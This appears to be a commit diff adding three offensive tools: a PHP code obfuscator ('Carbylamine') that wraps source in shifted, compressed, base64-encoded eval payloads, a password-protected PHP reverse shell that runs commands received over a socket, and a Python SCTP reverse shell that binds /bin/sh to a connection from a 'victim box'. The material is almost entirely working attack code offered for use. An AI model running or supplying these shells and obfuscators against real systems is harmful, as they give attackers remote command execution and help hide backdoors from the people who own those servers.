update php

php/carbylamine.txt

@@ -0,0 +1,103 @@
+<?php
+function rstr() //Random String Function
+{
+ $len=rand(3,6);
+ $chr='';
+ for($i=1;$i<=$len;$i++)
+ {
+  $chr.=rand(0,1) ? chr(rand(65,90)) : chr(rand(97,122));
+ }
+ return $chr;
+}
+function enjumble($data) //Custom Encoding + Base64 + gzinflate()
+{
+ for($i=0;$i<strlen($data);$i++)
+ {
+  $data[$i]=chr(ord($data[$i])+1);
+ }
+ return base64_encode(gzdeflate($data,9));
+}
+function striptag($in) //Remove '<?php' from initial code
+{
+ $pos = strpos($in,"<?php"); //to do: add support for short_tags 
+ if(is_numeric($pos))
+ {
+  for($i=$pos;$i<=$pos+4 && strlen($in) >=5;$i++)
+  {
+  $in[$i]=' ';
+  }
+  return $in;
+ }
+ else
+ {
+ return $in;
+ }
+}
+function makeoutfile($str)
+{ $funcname=rstr();
+$varname='$'.rstr();
+$template=
+"<?php function ".$funcname."($varname)
+{ 
+$varname=gzinflate(base64_decode($varname));
+ for(\$i=0;\$i<strlen($varname);\$i++)
+ {
+".$varname."[\$i] = chr(ord(".$varname."[\$i])-1);
+ }
+ return $varname;
+ }eval($funcname(\"";
+  $str=enjumble($str);
+ $template = $template . $str."\"));?>";
+ return $template;
+}
+function main($argc,$argv)
+{
+$banner=
+"\n +-------------------------------------------------------------------+
+ |+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
+ |+                                                                 +|
+ +____               _             _                    _           +| 
+/  __ \             | |           | |                  (_)          +|   
+| /  \/  __ _  _ __ | |__   _   _ | |  __ _  _ __ ___   _  _ __    _+|_ 
+| |     / _` || '__|| '_ \ | | | || | / _` || '_ ` _ \ | || '_ \  / _ \
+| \__/\| (_| || |   | |_) || |_| || || (_| || | | | | || || | | ||  __/
+ \____/ \__,_||_|   |_.__/  \__, ||_| \__,_||_| |_| |_||_||_| |_| \___|
+ |+                         __/ |                                    +|  
+ |+                    Carbylamine PHP Encoder                      +|  
+ |+                           v0.1.1 Nightly                        +|
+ |+                                                                 +|
+ |+                                                                 +|
+ |+                      Coded by Prakhar Prasad                    +|
+ |+                        (prakharpd@gmail.com)                    +|
+ |+                                                                 +|
+ |+                                                                 +|
+ |+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
+ +-------------------------------------------------------------------+\n\n";
+$usage="$banner Syntax: ".$_SERVER['PHP_SELF']." <file to encode> <output file>\n";
+if($argc==1) {echo $usage ; die();}
+if($argc>1) $file = $argv[1];
+if($argc>2) $outfile = $argv[2];
+if(empty($file) || empty($outfile)) { echo "Input/Output filename not entered!\n\n\x07" ;die();}
+if(!file_exists($file))
+{
+echo "$banner Error: Input file doesn't exist\n\n\x07";
+}
+else{
+$orginal_size=round(filesize($file)/1024,2);
+echo "$banner  Encoding : $file ($orginal_size KB) \n\n ";
+$output_filename=$outfile;
+$outfile=fopen($outfile,'w+');
+$file=fread(fopen($file,'r'),filesize($file));
+$outdata=makeoutfile(striptag($file));
+$newsize=round(strlen($outdata)/1024,2);
+echo " Compression : ".@round(100-(($newsize*100)/($orginal_size!=0?$orginal_size:1)),2)."%\n\n";
+if(!fwrite($outfile,$outdata))
+{
+ echo " Unable to write to $output_filename\n\n\x07";
+}
+else
+{
+echo "  Successfully Encoded! to $output_filename\n\n" ;
+}}}
+main($argc,$argv);
+?>

php/reverseshell-poc.txt

@@ -0,0 +1,102 @@
+<?php
+###################################################
+#               Reverse Shell v1.0                #
+#             Authentication Feature              #
+#                                                 #
+#            Hacksys Team - Panthera              #
+#             Author: Ashfaq Ansari               #
+#            hacksysteam@hotmail.com              #
+#          http://hacksys.vfreaks.com             #
+#              Designed for Linux                 #
+#             Thanks to lionaneesh                #
+#             lionaneesh@gmail.com                #
+###################################################
+
+ini_set('max_execution_time' ,0);
+
+$VERSION = "1.0";
+$ip = "127.0.0.1"; #Change this
+$port = 4444;      #Change this
+$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (MD5)
+
+$banner = ("
+ _    _            _     _____            
+| |  | |          | |   / ____|                            
+| |__| | __ _  ___| | _| (___  _   _ ___
+|  __  |/ _` |/ __| |/ /\___ \| | | / __|
+| |  | | (_| | (__|   < ____) | |_| \__ \
+|_|  |_|\__,_|\___|_|\_\_____/ \__, |___/
+ _______                        __/ |                                
+|__   __|                      |___/  
+   | | ___  __ _ _ __ ___  
+   | |/ _ \/ _` | '_ ` _ \
+   | |  __/ (_| | | | | | |
+   |_|\___|\__,_|_| |_| |_|
+   
+    Reverse Shell in PHP
+    Author: Ashfaq Ansari
+   hacksysteam@hotmail.com
+ http://hacksys.vfreaks.com/\n\n");
+
+$pwd = shell_exec("pwd");
+$sysinfo = shell_exec("uname -a");
+$id = shell_exec('id | cut -d "(" -f 2 | cut -d ")" -f 1' );
+$date = shell_exec("date");
+$len = 1337;
+$info =
+("
+System Information:\n$sysinfo
+Current Working Directory: $pwd
+User Group: $id
+Current Date and Time: $date\n
+");
+
+print "\nTrying to connect to: $ip on port $port ...\n\n";
+
+$sockfd = fsockopen($ip , $port , $errno, $errstr );
+
+if($errno != 0)
+  {
+    print "\n****** Error Occured ******\nError Nnumber: $errno\nError String: $errstr\n\n";
+    die(0);
+  }
+else if (!$sockfd)
+  {
+    print "Fatal : An unexpected error was occured when trying to connect!\n";
+  }
+else
+  {
+    print "Connected to: $ip on port $port ...\n\n";
+    fputs ($sockfd , $banner);
+    fputs($sockfd ,"Enter Password: ");
+    $getpass = trim(fgets($sockfd, strlen($password) + 2));
+
+    if ($getpass == $password)
+    {
+      fputs($sockfd, "\nAuthentication Successfull..\n");
+      fputs($sockfd, $info);
+      while(!feof($sockfd))
+      {
+    $cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
+    fputs ($sockfd , $cmdPrompt );
+    $command = trim(fgets($sockfd, $len));
+        if (trim($command) == "exit")
+    {
+      fputs($sockfd ,"\nAborted by user... Exiting..." );
+      fclose($sockfd);
+      die(0);
+    }
+    fputs($sockfd , "\n" . shell_exec($command) . "\n");
+      }
+      fclose($sockfd);
+      die(0);
+    }
+    else
+    {
+      fputs($sockfd ,"\nInvalid Password... Quitting...");
+      fclose($sockfd);
+      die(0);
+    }
+  }
+?>
+

py/sctp_reverse.py.txt

@@ -0,0 +1,36 @@
+#!/usr/bin/python
+# SCTP Reverse Shell (TCP mode)
+# Requires pysctp and sctp to be working
+# on the victim box.
+# My perfect saturday... Involves #
+# infodox - Insecurety Research 2013
+# insecurety.net | @info_dox
+
+# I probably imported too much things. Who cares.
+import socket
+import _sctp
+import sctp
+from sctp import *
+import os
+import subprocess
+
+host = '127.0.0.1' # CHANGEME
+port = 1337 # CHANGEME
+
+socket.setdefaulttimeout(60)
+s = None
+try:
+    s = sctpsocket_tcp(socket.AF_INET)
+    s.connect((host,port))
+    s.send('g0tsh3ll!\n')
+    save = [ os.dup(i) for i in range(0,3) ]
+    os.dup2(s.fileno(),0)
+    os.dup2(s.fileno(),1)
+    os.dup2(s.fileno(),2)
+    shell = subprocess.call(["/bin/sh","-i"])
+    [ os.dup2(save[i],i) for i in range(0,3)]
+    [ os.close(save[i]) for i in range(0,3)]
+    os.close(s.fileno())
+except Exception:
+    print "Connection Failed! Is there even a listener?"
+    pass